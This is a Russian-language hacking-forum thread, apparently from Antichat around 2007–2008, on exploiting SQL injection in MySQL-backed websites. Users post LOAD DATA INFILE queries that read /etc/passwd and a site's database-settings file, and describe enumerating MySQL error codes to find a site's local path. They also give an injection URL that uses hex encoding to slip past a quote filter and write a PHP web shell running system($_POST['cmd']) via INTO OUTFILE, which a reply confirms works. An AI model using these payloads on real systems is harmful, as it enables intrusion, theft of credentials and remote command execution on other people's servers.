22.07.2007, 12:31
|
|
Banned
Регистрация: 21.07.2007
Сообщений: 504
С нами:
9898343
Репутация:
445
|
|
404 not found /video.rar
=\
Перезалейте
|
|
|
22.07.2007, 19:51
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
На видио вы ничего особенного не увидете, если не поняли смысл того что написано, то и видио смотреть бессмысленно, имхо
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
23.07.2007, 11:44
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
У меня видео не осталось, спасибо модерам видео ачата что проигнорировали.
|
|
|
|
23.09.2007, 18:47
|
|
Новичок
Регистрация: 16.03.2006
Сообщений: 8
С нами:
10608048
Репутация:
8
|
|
так кто знает способ заливки шелла,когда magic_quotes=on ?
|
|
|
|
08.11.2007, 02:50
|
|
Новичок
Регистрация: 04.11.2007
Сообщений: 4
С нами:
9746815
Репутация:
1
|
|
Сообщение от gemaglabin
Если файл не удается прочитать можно попробовать его в таблицу запихнуть
PHP код:
LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n'
LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table (colum1,column2)
у меня проблема с чтением файла делаю вот так
PHP код:
DROP TABLE IF EXISTS s;
CREATE TABLE `s` (`script` TEXT NOT NULL);
LOAD DATA LOCAL INFILE "/home/www/db_settings.php" INTO TABLE s;
SELECT * FROM s
на выводе всё что в файле идет внутри знаков {*} и array("*") пропустилось
|
|
|
|
11.12.2007, 17:28
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Небольшое дополнение к статье
Бывает что у юзера от которого работает скрипт есть file_priv, но мы не можем узнать локальный путь до сайта, ну или не знаем папки на сайте. Если при возникновении неправильного запроса мы видим полное описание ошибки, то это может помочь нам в загрузке файла на сервер, т.к. мускул при попытке создать файл выводит номера ошибок Unix-подобных систем.
т.е предположим мы хотим создать файл в каталоге root что нам в 99.99% случаях не получится, тогда MySQL выдаст нам нечто подобное
Can't create/write to file '/root/xek.txt' (Errcode: 13)
Ошибка с кодом 13 означает Permission Denied
При попытке создать уже имеющийся файл:
Can't create/write to file '/etc/passwd' (Errcode: 17)
File already exists
и при попытке создать файл в несуществующей директории:
Can't create/write to file '/xek/nepoxek/123.txt' (Errcode: 2)
No such file or directory
Т.е благодаря простому перебору мы можем найти локальный путь к сайту, хотя это очень геморно и конечно не даёт 100% гарантии его нахождения
Повторюсь что данные ошибки появляются не всегда =\
|
|
|
|
11.12.2007, 17:35
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
угу, я тоже замечал что то наподобие, я это написал в пояснении к видео по взлому, но видео так и не выложил, т.к. понял что в видео ничего суперпотрясающего нет...
вот цитата из пояснения:
(К слову сказать, часто бывает так, что если есть права на чтение файлов через sql инъекцию, то при обращении к несуществующей директории возникает ошибка синтаксиса, а при обращении к существующей директории ошибки не возникает (но ничего естественно не выводит) это очень помогает в поиске путей к файлам, попробуйте в phpMyAdmin)
С FreeBSD дела обстаят проще...
вот здесь про это можно прочитать:
http://forum.antichat.ru/thread55237.html
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 11.12.2007 в 17:38..
|
|
|
|
21.12.2007, 22:39
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 69
С нами:
9734726
Репутация:
676
|
|
Mysql в шестой ветке всерьез задумались поддержать именитую x-технологий xml и дать нам еще одну возможность для подрузки файла - новая функция под названием LOAD XML.Насчет ограничений обрамления файла ковычками не знаю но на сайте mysql написано что имя файла должно быть заключено в ковычки.
Файл должен быть примерно в таком виде.Поставим - увидим , что получится ...
<row>
<column1>value1</column1>
<column2>value2</column2>
</row>
http://dev.mysql.com/doc/refman/6.0/en/load-xml.html |
|
|
|
31.01.2008, 05:04
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
С нами:
9630275
Репутация:
15
|
|
У меня вопрос, вот пример есть сайт но там стоит фильтр на кавычки. Я могу читать файлы только через SQL HEX такой если я пример зашифрую
/tmp/shell.php - без ковычик в SQL HEX
<?php system($_POST['cmd']);?> - SQL HEX и у меня получится так:
http://site.com/index.php?id=-1+union+select+1,2,тут зашифрованный шелл в SQL HEX,4,5,6+from+user+into+outfile+а тут зашифрованный /tmp/shell.php в SQL HEX (0x746d702f7368656c6c2e706870)/*
Это команда выполнится? То есть если у меня хватает прав на запись, то разницы нету в в SQL HEX я передаю или нет?
|
|
|
|
31.01.2008, 05:12
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
нету
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
